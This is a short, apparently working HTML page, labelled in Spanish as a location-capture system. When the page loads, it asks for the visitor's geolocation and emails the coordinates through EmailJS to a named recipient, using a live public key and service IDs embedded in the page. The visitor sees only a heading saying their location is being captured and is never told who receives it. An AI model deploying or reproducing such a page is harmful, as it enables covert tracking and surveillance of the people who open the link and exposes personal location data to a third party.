<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Captura de Ubicación</title>
    <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
    <script type="text/javascript">
        (function(){
            emailjs.init("IfiG_6E4baZNbRjrN"); // Reemplaza 'IfiG_6E4baZNbRjrN' con tu clave pública de EmailJS
        })();

        function sendLocation() {
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(function(position) {
                    var latitude = position.coords.latitude;
                    var longitude = position.coords.longitude;

                    var templateParams = {
                        latitude: latitude,
                        longitude: longitude,
                        to_name: "giancarlos",
                        from_name: "Location Capturing System"
                    };

                    emailjs.send('service_35tuu5k', 'template_36gntkh', templateParams)
                        .then(function(response) {
                           console.log('SUCCESS!', response.status, response.text);
                        }, function(error) {
                           console.log('FAILED...', error);
                        });
                });
            } else {
                alert("La geolocalización no es soportada por este navegador.");
            }
        }
    </script>
</head>
<body onload="sendLocation()">
    <h1>Capturando tu ubicación...</h1>
</body>
</html>
